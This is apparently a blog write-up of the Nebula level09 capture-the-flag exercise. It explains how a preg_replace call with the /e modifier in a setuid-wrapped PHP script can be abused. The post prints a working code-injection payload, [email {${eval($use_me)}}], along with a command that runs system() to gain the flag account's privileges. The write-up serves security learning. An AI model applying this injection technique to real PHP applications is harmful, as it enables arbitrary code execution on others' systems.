Nebula level09

http://exploit-exercises.com/nebula/level09

There's a C setuid wrapper for some vulnerable PHP code...
To do this level, log in as the level09 account with the password level09 . Files for this level can be found in /home/flag09.

 1<?php 2 3function spam($email) 4{ 5  $email = preg_replace("/\./", " dot ", $email); 6  $email = preg_replace("/@/", " AT ", $email); 7   8  return $email; 9}1011function markup($filename, $use_me)12{13  $contents = file_get_contents($filename);1415  $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);16  $contents = preg_replace("/\[/", "<", $contents);17  $contents = preg_replace("/\]/", ">", $contents);1819  return $contents;20}2122$output = markup($argv[1], $argv[2]);2324print $output;2526?>

Well, I must admit that this time all was new to me. Let’s begin!

After initial parsing of the provided PHP script we can gather basic understanding of the logic along with some useful hints (oddly looking $use_me variable, regular expressions, and this whole preg_replace() function are most important).

The script works as follows: You provide the file which it tries to open, parse and print. If we want to hit spam() function we need to provide proper input, which looks like [email foo@bar.com]:

$ cat ~/pwn.txt
[email foo@bar.com]
$ ./flag09 ~/pwn.txt barfoo
foo AT bar dot com

Now, onto the vulnerability.

If you google preg_replace() then one of the first hits is this, nothing special but we can understand a little bit better how to properly use this function.

Now, I didn’t have much experience in regular expressions so I read couple of tutorials but the one thing that did struck me was this "/(\[email (.*)\])/e" regexp, to be specific the letter "e" after slash. I did not stumbled upon this in any tutorial so I, again, googled it. Lo and behold this is what I found.

So, we already know the core issue here. We only need to connect the dots to craft an exploit.

From the above document and initial hints we do know that the malicious line in ~/pwn.txtneeds to look like [email {${eval($use_me)}}]. We will use $use_me variable (that comes from the second argument of our C wrapper) to provide arbitrary PHP code for eval(). And that should suffice:

$ cat ~/pwn.txt
[email {${eval($use_me)}}]
$ ./flag09 ~/pwn.txt "system(\"/bin/getflag\");"
You have successfully executed getflag on a target account
PHP Notice: Undefined variable: in /home/flag09/flag09.php(15) : regexp code on line 1

Another one bites the dust.